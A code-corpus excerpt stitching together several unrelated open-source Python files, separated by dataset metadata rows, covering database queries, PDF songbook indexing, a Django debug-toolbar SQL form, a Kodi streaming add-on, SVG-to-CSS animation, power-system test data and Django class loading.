columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
def _get_final_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("final_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
| bsd-3-clause | -2,396,430,855,391,345,700 | 32.523918 | 117 | 0.575865 | false | 4.10516 | false | false | false |
wojtex/cantionale | title_index.py | 1 | 1914 |
class TitleIndex:
def __init__(self, songbook, params):
self.title = ''
self.filter = lambda x : True
if 'title' in params: self.title = params['title']
if 'filter' in params: self.filter = params['filter']
def draw(self, canvas, songbook):
sb = songbook
st = sb.style
c = canvas
wdt = sb.width
position = sb.height - st.title_index_margin_top
c.setFont(st.title_index_title_font_name, st.title_index_title_font_size)
for line in self.title.strip().split(sep='\n'):
position -= st.title_index_title_line_height
c.drawCentredString(wdt/2, position, line)
position -= st.title_index_title_song_spacing
songs = []
for section in songbook.sections:
for no, song in enumerate(section.songs):
if self.filter((no,song)):
songs.append((song.title, section.index(no+1)))
songs.sort()
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.toc_margin_inner
margin_right = st.toc_margin_outer
lh = st.title_index_song_line_height
for title, index in songs:
if lh + st.title_index_margin_bottom > position:
c.showPage()
position = sb.height - st.title_index_margin_top
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.title_index_margin_inner
margin_right = st.title_index_margin_outer
position -= st.title_index_song_song_spacing
position -= lh
c.setFont(st.title_index_song_number_font_name, st.title_index_song_number_font_size)
c.drawRightString(st.title_index_song_number_indent + margin_left, position, index)
c.setFont(st.title_index_song_title_font_name, st.title_index_song_title_font_size)
c.drawString(st.title_index_song_title_indent + margin_left, position, title)
c.showPage()
if sb.is_left_page(c):
c.showPage()
| mit | -7,055,911,410,535,979,000 | 33.178571 | 88 | 0.692268 | false | 2.835556 | false | false | false |
mvaled/sentry | src/debug_toolbar/panels/sql/forms.py | 1 | 2785 | from __future__ import absolute_import, unicode_literals
import json
import hashlib
from django import forms
from django.conf import settings
from django.db import connections
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.core.exceptions import ValidationError
from debug_toolbar.panels.sql.utils import reformat_sql
class SQLSelectForm(forms.Form):
"""
Validate params
sql: The sql statement with interpolated params
raw_sql: The sql statement with placeholders
params: JSON encoded parameter values
duration: time for SQL to execute passed in from toolbar just for redisplay
hash: the hash of (secret + sql + params) for tamper checking
"""
sql = forms.CharField()
raw_sql = forms.CharField()
params = forms.CharField()
alias = forms.CharField(required=False, initial="default")
duration = forms.FloatField()
hash = forms.CharField()
def __init__(self, *args, **kwargs):
initial = kwargs.get("initial", None)
if initial is not None:
initial["hash"] = self.make_hash(initial)
super(SQLSelectForm, self).__init__(*args, **kwargs)
for name in self.fields:
self.fields[name].widget = forms.HiddenInput()
def clean_raw_sql(self):
value = self.cleaned_data["raw_sql"]
if not value.lower().strip().startswith("select"):
raise ValidationError("Only 'select' queries are allowed.")
return value
def clean_params(self):
value = self.cleaned_data["params"]
try:
return json.loads(value)
except ValueError:
raise ValidationError("Is not valid JSON")
def clean_alias(self):
value = self.cleaned_data["alias"]
if value not in connections:
raise ValidationError("Database alias '%s' not found" % value)
return value
def clean_hash(self):
hash = self.cleaned_data["hash"]
if hash != self.make_hash(self.data):
raise ValidationError("Tamper alert")
return hash
def reformat_sql(self):
return reformat_sql(self.cleaned_data["sql"])
def make_hash(self, data):
items = [settings.SECRET_KEY, data["sql"], data["params"]]
# Replace lines endings with spaces to preserve the hash value
# even when the browser normalizes \r\n to \n in inputs.
items = [" ".join(force_text(item).splitlines()) for item in items]
return hashlib.sha1("".join(items).encode("utf-8")).hexdigest()
@property
def connection(self):
return connections[self.cleaned_data["alias"]]
@cached_property
def cursor(self):
return self.connection.cursor()
| bsd-3-clause | -6,826,950,877,515,031,000 | 28.946237 | 83 | 0.647038 | false | 4.311146 | false | false | false |
manusev/plugin.video.kuchitv | resources/regex/freebroadcast.py | 1 | 5105 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# MonsterTV - XBMC Add-on by Juarrox ([email protected])
# Version 0.2.9 (18.07.2014)
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Gracias a la librería plugintools de Jesús (www.mimediacenter.info)
import os
import sys
import urllib
import urllib2
import re
import shutil
import zipfile
import time
import xbmc
import xbmcgui
import xbmcaddon
import xbmcplugin
import plugintools
import json
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
# Función que guía el proceso de elaboración de la URL original
def freebroadcast(params):
plugintools.log("[MonsterTV-0.3.0].freebroadcast "+repr(params))
url_user = {}
# Construimos diccionario...
url = params.get("url")
url_extracted = url.split(" ")
for entry in url_extracted:
if entry.startswith("rtmp"):
entry = entry.replace("rtmp=", "")
url_user["rtmp"]=entry
elif entry.startswith("playpath"):
entry = entry.replace("playpath=", "")
url_user["playpath"]=entry
elif entry.startswith("swfUrl"):
entry = entry.replace("swfUrl=", "")
url_user["swfurl"]=entry
elif entry.startswith("pageUrl"):
entry = entry.replace("pageUrl=", "")
url_user["pageurl"]=entry
elif entry.startswith("token"):
entry = entry.replace("token=", "")
url_user["token"]=entry
elif entry.startswith("referer"):
entry = entry.replace("referer=", "")
url_user["referer"]=entry
plugintools.log("URL_user dict= "+repr(url_user))
pageurl = url_user.get("pageurl")
# Controlamos ambos casos de URL: Único link (pageUrl) o link completo rtmp://...
if pageurl is None:
pageurl = url_user.get("url")
referer= url_user.get("referer")
if referer is None:
referer = 'http://www.juanin.tv'
# channel_id = re.compile('channel=([^&]*)').findall(pageurl)
# print channel_id
# channel_id = channel_id[0]
pageurl = 'http://freebroadcast.pw/embed/embed.php?n=' + url_user.get("playpath") + '&w=670&h=400'
url_user["pageurl"]=pageurl
print 'pageurl',pageurl
print 'referer',referer
body = gethttp_headers(pageurl, referer)
getparams_freebroadcast(url_user, body)
url = url_user.get("ip") + ' playpath=' + url_user.get("playpath") + ' swfUrl=http://freebroadcast.pw/player/player.swf pageUrl=' + url_user.get("pageurl") + ' live=1 timeout=10'
plugintools.play_resolved_url(url)
# Vamos a hacer una llamada al pageUrl
def gethttp_headers(pageurl, referer):
request_headers=[]
request_headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"])
# request_headers.append(["Referer",referer])
body,response_headers = plugintools.read_body_and_headers(pageurl, headers=request_headers)
plugintools.log("body= "+body)
return body
# Iniciamos protocolo de elaboración de la URL original
# Capturamos parámetros correctos
def getparams_freebroadcast(url_user, body):
plugintools.log("[MonsterTV-0.3.0].getparams_freebroadcast " + repr(url_user) )
# Construimos el diccionario de 9stream
entry = plugintools.find_single_match(body, 'setStream(token) {(.*?)}')
ip = re.compile("streamer', \'(.*?)\'").findall(body)
url_user["ip"]=str(ip[0])
plugintools.log("IP= "+str(ip[0]))
# Vamos a capturar el playpath
def getfile_freebroadcast(url_user, decoded, body):
plugintools.log("MonsterTV getfile_freebroadcast( "+repr(url_user))
referer = url_user.get("referer")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer', referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
file = re.compile("file': '([^.]*)").findall(data)
print 'file',file
return file
# Vamos a capturar el fileserver.php (token del server)
def get_fileserver(decoded, url_user):
plugintools.log("MonsterTV fileserver "+repr(url_user))
referer=url_user.get("pageurl")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer',referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
token = re.compile('token":"(.*)"').findall(data)
print 'token',token
return token
| gpl-2.0 | 6,524,703,570,245,585,000 | 34.395833 | 182 | 0.627232 | false | 3.400267 | false | false | false |
soybean217/lora-python | UServer/admin_server/admin_data_update/model/gateway_locaton_data.py | 1 | 1618 | # _*_ coding:utf-8 _*_
from database.db4 import db4, Channel4, ConstDB4
from utils.log import Logger, Action
class Location:
channel_name = Channel4.gis_gateway_location + '*'
def __init__(self):
self.ps = db4.pubsub()
def psubscribe_gis(self):
self.ps.psubscribe(self.channel_name)
return self.ps
def stop_listen(self):
if hasattr(self, 'ps'):
self.ps.punsubscribe()
def listen_gis_gateway_location(self):
Logger.info(Action.listen, 'psubscribe', self.channel_name, 'Begin listen')
ps_init = self.psubscribe_gis()
for item in ps_init.listen():
if item is not None:
if item['type'] == 'pmessage':
Logger.info(Action.listen, item['channel'].decode(), 'MESSAGE', item['data'].decode())
gateway_id = item['channel'].decode().split(':')[1]
location_data = item['data'].decode().split(',')
if len(location_data) == 3:
lng = float(location_data[0])
lat = float(location_data[1])
alt = int(location_data[2])
msg = self.Object(gateway_id, lat=lat, lng=lng, alt=alt)
yield msg
else:
Logger.info(Action.listen, item['channel'].decode(), item['type'], item['data'])
class Object:
def __init__(self, gw_id, lat, lng, alt):
self.gateway_id = gw_id
self.latitude = lat
self.longitude = lng
self.altitude = alt
| mit | -8,514,074,294,372,980,000 | 34.173913 | 106 | 0.520396 | false | 4.00495 | false | false | false |
geishatokyo-lightning/lightning | lightning_core/vg/cssanim.py | 1 | 14273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011 Geisha Tokyo Entertainment, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import with_statement
import os
import sys
from lxml import etree
from copy import deepcopy
from parser import *
from StringIO import StringIO
import logging
import simplejson as json
import re
from collections import deque
from copy import deepcopy
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S')
class CssElement(dict):
def __init__(self, title=''):
super(CssElement, self).__init__()
self.common_element = {
'position' : ['position', 'absolute'],
'transform': ['-webkit-transform', None],
'origin' : ['-webkit-transform-origin', '0.0px 0.0px'],
}
self.animation_element = {
'name' : ['-webkit-animation-name', None],
'timing' : ['-webkit-animation-timing-function', 'linear'],
'count' : ['-webkit-animation-iteration-count', 'infinite'],
'duration' : ['-webkit-animation-duration', None],
}
self.shape_element = {
'left' : ['left' , None],
'top' : ['top' , None],
'width' : ['width' , None],
'height' : ['height' , None],
}
self.title = title
self.sp = '\n' # splitter
def __str__(self):
content = self.sp.join(['%s: %s;' % (k,v) for k,v in self.iteritems()])
return '%s {%s%s%s}%s' % (self.title, self.sp, content, self.sp, self.sp)
def add_anims_element(self, key, anim_length, has_anim_name):
self.animation_element['name'][1] = key
self.animation_element['duration'][1] = '%fs'%(float(anim_length)/12.0)
if not has_anim_name:
del self.animation_element['name']
self.update(self.animation_element.values())
self.update(self.common_element.values())
def add_shape_element(self, shape_key, shape_table):
def calc_twips_to_pixel(twips):
return '%dpx' % int(round(float(twips)/20))
shape = shape_table[shape_key]
self.shape_element['left'][1] = calc_twips_to_pixel(shape.left)
self.shape_element['top'][1] = calc_twips_to_pixel(shape.top)
self.shape_element['width'][1] = calc_twips_to_pixel(shape.width)
self.shape_element['height'][1] = calc_twips_to_pixel(shape.height)
self.update(self.shape_element.values())
del self.common_element['origin']
def add_origin_element(self, matrix):
self.common_element['transform'][1] = matrix
self.update(self.common_element.values())
class SvgShape(object):
def __init__(self, elem):
self.obj = elem[0]
self.hash = elem[1]
self.left = int(elem[2])
self.top = int(elem[3])
self.width = int(elem[4])
self.height = int(elem[5])
self.symbol = ''
self.edges = []
self.defs =[]
def filename(self, dir_path='.'):
return os.path.join(dir_path, '%s_%s.svg' % (self.obj, self.hash))
class SvgTransform(Transform):
def __init__(self, attrib):
super(SvgTransform,self).__init__()
values = dict([(k,float(attrib[k])) if k in attrib else (k,None) for k in self.MATRIX])
self.set_items(values)
if 'depth' in attrib:
self.depth = int(attrib['depth'])
if 'ctf' in attrib:
self.ctf = ColorTransform([int(ctf.strip()) for ctf in attrib['ctf'].strip('[]').split(',') if ctf.strip().lstrip('-').isdigit()])
if 'clipDepth' in attrib:
self.clipDepth = int(attrib['clipDepth'])
if 'visible' in attrib and attrib['visible'] == 'False':
self.visible = False
def __eq__(self, other):
return [self.sx, self.sy, self.wx, self.wy, self.tx, self.ty, self.get_opacity()]==other
def write_matrix(self):
return self._shorten('matrix(%.6f,%.6f,%.6f,%.6f,%.6f,%.6f)' % self.get_matrix())
def write_matrix3d(self):
return self._shorten('matrix3d(%.6f,%.6f,0,0,%.6f,%.6f,0,0,0,0,1,0,%.6f,%.6f,0,1)' % (self.sx, self.wx, self.wy, self.sy, self.tx/20, self.ty/20))
def write_webkit_transform(self):
return self._shorten('-webkit-transform: %s;' % self.write_matrix3d())
def _shorten(self, str):
return str.replace('.000000', '.0')
def get_opacity(self):
opacity = 1.0
if not self.visible:
opacity = 0.0
else:
if len(self.ctf) == 8:
c = Color([0,0,0,256])
c.transform(self.ctf)
opacity = (float(c.a) / 256.0)
return opacity
def write_visible(self):
return self._shorten('opacity: %.6f;' % self.get_opacity())
class AnimationManager(object):
def __init__(self, dir_path, basefilename):
self.dir_path = dir_path
self.shapes_filepath = self._get_path('shapes')
self.animation_filepath = self._get_path('animation.xml')
self.structure_filepath = self._get_path('structure.xml')
self.cssfilepath = os.path.join('.', basefilename + '.css')
self.htmlfilepath = os.path.join('.', basefilename + '.html')
self.xmlfilename = os.path.basename(basefilename.replace('.svg',''));
def _get_path(self, filename):
return os.path.join(self.dir_path, filename)
def load_shapes(self):
with open(self.shapes_filepath, 'r') as f:
return self.get_shapes(f.readlines())
def get_shapes(self, lines):
shape_table = {}
for line in lines:
elems = line.split(' ')
if len(elems) == 6: # 'shapes'
shape_table[elems[0]] = SvgShape(elems)
return shape_table
def load_animation(self):
root = self._parse_xml(self.animation_filepath)
return self.get_animation(root)
def get_animation(self, root):
anim_table = {}
for anim in root.xpath('//animation'):
key = anim.attrib['key'][:-2]
frames = anim.findall('frame')
anim_table[key] = [SvgTransform(frame.attrib) for frame in frames]
return anim_table
def load_structure(self, shape_table, parser_shapes):
root = self._parse_xml(self.structure_filepath)
return self.get_structure(root, shape_table, parser_shapes)
def get_structure(self, root, shape_table, anim_table, ctfsArray, parser_shapes, mcname=None, key_prefix=""):
def get_parent_key(elem):
parent = elem.getparent()
if parent is not None and parent.attrib.has_key('class'):
p_attrib_cls = parent.attrib['class']
s = re.search('obj\d+', p_attrib_cls)
if s is not None:
return s.group()
else:
return ''
def update_elem(elem, key, name, hasClipDepth):
elem.tag = 'div'
elem.attrib.clear()
elem.attrib['class'] = key
if name is not None :
elem.attrib['id'] = name
if hasClipDepth:
elem.attrib['style'] = 'display:none;'
structure_table = {}
if mcname is None:
root_elem = root
else:
r = root.xpath('//part[@name="%s"]'%mcname)
if r is None:
root_elem = root
else:
root_elem = r[0]
for elem in root.xpath('//part'):
if 'key' in elem.attrib:
key = elem.attrib['key']
objId = LUtil.objectID_from_key(key)
depth = elem.attrib['depth']
hasClipDepth = 'clipDepth' in elem.attrib
name = elem.attrib['name'] if 'name' in elem.attrib else None
ctf = json.loads(elem.attrib['ctf'])
if len(ctf) > 1:
ctfsArray.append({key:ctf})
key_depth = LUtil.make_key_string(objId, prefix=key_prefix, suffix=depth)
structure_table[key_depth] = SvgTransform(elem.attrib)
update_elem(elem, key_depth, name, hasClipDepth)
k = objId[3:]
if (len(elem) == 0) and (k in parser_shapes):
shape_key = LUtil.make_key_string(objId, prefix=key_prefix, suffix='shape')
parent_key = get_parent_key(elem)
childdiv = etree.Element('div')
childdiv.set('class', shape_key)
structure_table[shape_key] = SvgTransform(childdiv.attrib)
svgelem = Parser.str_shape_as_svg(parser_shapes[k], ctfsArray, parent_key)
childdiv.append(svgelem)
elem.append(childdiv)
structure_tree = deepcopy(root_elem)
return structure_table, structure_tree
def _parse_xml(self, filepath):
with open(filepath, 'r') as f:
return etree.parse(f)
return None
def _remove_deplicated_keyframes(self, anim_elements):
anim_buffer = deque()
result = []
for percent, transform in anim_elements:
anim_buffer.append((percent, transform))
if len(anim_buffer) == 3:
if anim_buffer[0][1] == anim_buffer[1][1] and anim_buffer[0][1] == anim_buffer[2][1]:
anim_buffer = deque((anim_buffer[0], anim_buffer[2]))
else:
result.append(anim_buffer.popleft())
result.extend(list(anim_buffer))
return result
def _interpolate_keyframes(self, anim_elements, eps=0.0001):
result = []
old_transform = None
for i, (percent, transform) in enumerate(anim_elements):
if old_transform is not None:
if (not old_transform.visible and transform.visible):
temp_transform = deepcopy(transform)
temp_transform.visible = old_transform.visible
result.append((percent - eps, temp_transform))
elif (old_transform.visible and not transform.visible):
result.append((percent - eps, old_transform))
result.append((percent, transform))
old_transform = transform
if len(result) > 0:
result.append((100.0, result[0][1])) # 100% animation
return result
def _make_keyframes(self, anim_table, key_prefix='', sp='\n'):
keyframes = []
for key, value in anim_table.iteritems():
anim_length = len(value)
anim_elements = [((float(i*100)/float(anim_length)), a) for i,a in enumerate(value)]
anim_list = ['%f%% { %s %s }' % (percent, a.write_webkit_transform(), a.write_visible()) for percent, a in self._interpolate_keyframes(self._remove_deplicated_keyframes(anim_elements))]
anim = sp.join(anim_list)
keyframes.append(sp.join(['@-webkit-keyframes %s {'%(key), anim, '}']))
return (sp+sp).join(keyframes)
def _make_transform(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n'):
result = []
for key, structure in structure_table.iteritems():
elem = CssElement(title='.%s'%key)
transform = ('-webkit-transform', structure.write_matrix())
if key in anim_table:
anim_length = len(anim_table[key])
elem.add_anims_element(key, anim_length, has_anim_name)
shape_key = LUtil.objectID_from_key(key)
if key.endswith('shape') and shape_key in shape_table:
elem.add_shape_element(shape_key, shape_table)
elem.add_origin_element(structure.write_matrix())
result.append(str(elem))
return (sp+sp).join(result)
def write_html(self, structure_tree, cssfilepath):
template = '''<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja">
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8"></meta>
<link href="%s" type="text/css" rel="stylesheet"></link>
<title>lightning</title>
</head>
<body>
%s
</body>
</html>
'''
html = template % (cssfilepath, etree.tostring(structure_tree, pretty_print=True))
return html
def write_div(self, structure_tree):
html = "%s" % (etree.tostring(structure_tree, pretty_print=True))
return html
def write_css(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n\n'):
elem = CssElement(title='div')
css = sp.join([self._make_keyframes(anim_table, key_prefix), self._make_transform(structure_table, shape_table, anim_table, key_prefix, has_anim_name)])
return 'svg { display:block; }\n' + css
def _write(self, filepath, content):
with open(filepath, 'w') as f:
f.write(content)
| mit | -3,026,379,057,328,387,000 | 39.092697 | 197 | 0.577664 | false | 3.682405 | false | false | false |
jayantk/jklol | scripts/sequence/generate_emission_features.py | 1 | 1090 | #!/usr/local/lib/python2.6
import re
import sys
filename = sys.argv[1]
def generate_string_features(word, label):
dict = {}
'''
patterns = ['\d$', '\d\d$', '\d\d\d+$', '\d?\d?:\d\d$',
'[0-9:]+$', '[A-Z]', '[A-Z]$', '[A-Z][A-Z]$',
'[A-Z]+$', '[^0-9A-Za-z]+$', '[^0-9]+$', '[A-Za-z]+$',
'[a-z]+$']
for pattern in patterns:
if re.match(pattern, word):
dict['regex=' + pattern + '_label=' + label] = 1
'''
dict['bias_label=' + label] = 1
dict['word=' + word.lower() + '_label=' + label] = 1
return dict
words = set()
labels = set()
with open(filename, 'r') as f:
for line in f:
chunks = line.strip().split(" ")
for i in range(0, len(chunks), 2):
words.add(chunks[i].strip())
labels.add(chunks[i + 1].strip())
for word in words:
for label in labels:
features = generate_string_features(word, label)
for feature in features.keys():
print "%s@#@#@%s@#@#@%s@#@#@%d" % (word, label, feature, features[feature])
| bsd-2-clause | 780,676,244,806,136,700 | 26.25 | 87 | 0.478899 | false | 3.01105 | false | false | false |
praba230890/PYPOWER | pypower/t/t_case_ext.py | 2 | 4105 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Case data in external format.
"""
from numpy import array, ones, arange, r_
def t_case_ext():
"""Case data in external format used to test C{ext2int} and C{int2ext}.
"""
ppc = {}
## PYPOWER Case Format : Version 2
ppc['version'] = '2'
##----- Power Flow Data -----##
## system MVA base
ppc['baseMVA'] = 100.0
## bus data
# bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin
ppc['bus'] = array([
[1, 3, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[2, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[30, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[4, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[5, 1, 90, 30, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[20, 4, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[6, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[7, 1, 100, 35, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[8, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[9, 1, 125, 50, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9]
])
## generator data
# bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,
# Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf
ppc['gen'] = array([
[30, 85, 0, 300, -300, 1, 100, 1, 270, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 163, 0, 300, -300, 1, 100, 1, 300, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[20, 20, 0, 300, -300, 1, 100, 1, 200, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 300, -300, 1, 100, 1, 250, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
], float)
## branch data
# fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax
ppc['branch'] = array([
[1, 4, 0, 0.0576, 0, 0, 250, 250, 0, 0, 1, -360, 360],
[4, 5, 0.017, 0.092, 0.158, 0, 250, 250, 0, 0, 1, -360, 360],
[5, 6, 0.039, 0.17, 0.358, 150, 150, 150, 0, 0, 1, -360, 360],
[30, 6, 0, 0.0586, 0, 0, 300, 300, 0, 0, 1, -360, 360],
[6, 7, 0.0119, 0.1008, 0.209, 40, 150, 150, 0, 0, 1, -360, 360],
[7, 8, 0.0085, 0.072, 0.149, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 20, 0, 0.1, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 2, 0, 0.0625, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 9, 0.032, 0.161, 0.306, 250, 250, 250, 0, 0, 1, -360, 360],
[9, 4, 0.01, 0.085, 0.176, 250, 250, 250, 0, 0, 1, -360, 360]
])
##----- OPF Data -----##
## area data
# area refbus
ppc['areas'] = array([
[2, 20],
[1, 5]
], float)
## generator cost data
# 1 startup shutdown n x1 y1 ... xn yn
# 2 startup shutdown n c(n-1) ... c0
ppc['gencost'] = array([
[2, 0, 0, 2, 15, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2500, 200, 5500, 250, 7250],
[2, 0, 0, 2, 20, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2000, 200, 4403.5, 270, 6363.5]
])
ppc['A'] = array([
[1, 2, 3, 4, 5, 0, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 17, 18, 19, 20, 21, 22, 0, 24, 25, 26, 0, 28, 29, 30],
[2, 4, 6, 8, 10, 0, 14, 16, 18, 20, 22, 24, 26, 28, 30, 0, 34, 36, 38, 40, 42, 44, 0, 48, 50, 52, 0, 56, 58, 60]
], float)
ppc['N'] = array([
[30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1],
[60, 58, 56, 54, 52, 50, 48, 46, 44, 42, 40, 38, 36, 34, 32, 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2],
], float)
ppc['xbus'] = arange(100, dtype=float).reshape((10, 10))
ppc['xgen'] = arange(16, dtype=float).reshape((4, 4))
ppc['xbranch'] = ppc['xbus'].copy()
ppc['xrows'] = r_[ppc['xbranch'][:, :4], ppc['xgen'], ppc['xbus'][:, :4], -ones((2, 4))]
ppc['xcols'] = ppc['xrows'].T
ppc['x'] = { 'more': ppc['xgen'] }
return ppc
| bsd-3-clause | -4,254,840,702,159,437,000 | 40.887755 | 125 | 0.436541 | false | 2.18119 | false | false | false |
ellmetha/django-machina | machina/core/loading.py | 1 | 3900 | import sys
import traceback
from django.conf import settings
class AppNotFoundError(Exception):
pass
class ClassNotFoundError(Exception):
pass
def get_class(module_label, classname):
return get_classes(module_label, [classname, ])[0]
def get_classes(module_label, classnames):
""" Imports a set of classes from a given module.
Usage::
get_classes('forum.models', ['Forum', 'ForumReadTrack', ])
"""
app_label = module_label.split('.')[0]
app_module_path = _get_app_module_path(module_label)
if not app_module_path:
raise AppNotFoundError('No app found matching \'{}\''.format(module_label))
# Determines the full module path by appending the module label
# to the base package path of the considered application.
module_path = app_module_path
if '.' in app_module_path:
base_package = app_module_path.rsplit('.' + app_label, 1)[0]
module_path = '{}.{}'.format(base_package, module_label)
# Try to import this module from the related app that is specified
# in the Django settings.
local_imported_module = _import_module(module_path, classnames)
# If the module we tried to import is not located inside the machina
# vanilla apps, try to import it from the corresponding machina app.
machina_imported_module = None
if not app_module_path.startswith('machina.apps'):
machina_imported_module = _import_module(
'{}.{}'.format('machina.apps', module_label), classnames,
)
if local_imported_module is None and machina_imported_module is None:
raise AppNotFoundError('Error importing \'{}\''.format(module_path))
# Any local module is prioritized over the corresponding machina module
imported_modules = [
m for m in (local_imported_module, machina_imported_module) if m is not None
]
return _pick_up_classes(imported_modules, classnames)
def _import_module(module_path, classnames):
""" Tries to import the given Python module path. """
try:
imported_module = __import__(module_path, fromlist=classnames)
return imported_module
except ImportError:
# In case of an ImportError, the module being loaded generally does not exist. But an
# ImportError can occur if the module being loaded exists and another import located inside
# it failed.
#
# In order to provide a meaningfull traceback, the execution information can be inspected in
# order to determine which case to consider. If the execution information provides more than
# a certain amount of frames, this means that an ImportError occured while loading the
# initial Python module.
__, __, exc_traceback = sys.exc_info()
frames = traceback.extract_tb(exc_traceback)
if len(frames) > 1:
raise
def _pick_up_classes(modules, classnames):
""" Given a list of class names to retrieve, try to fetch them from the specified list of
modules and returns the list of the fetched classes.
"""
klasses = []
for classname in classnames:
klass = None
for module in modules:
if hasattr(module, classname):
klass = getattr(module, classname)
break
if not klass:
raise ClassNotFoundError('Error fetching \'{}\' in {}'.format(
classname, str([module.__name__ for module in modules]))
)
klasses.append(klass)
return klasses
def _get_app_module_path(module_label):
""" Given a module label, loop over the apps specified in the INSTALLED_APPS to find the
corresponding application module path.
"""
app_name = module_label.rsplit('.', 1)[0]
for app in settings.INSTALLED_APPS:
if app.endswith('.' + app_name) or app == app_name:
return app
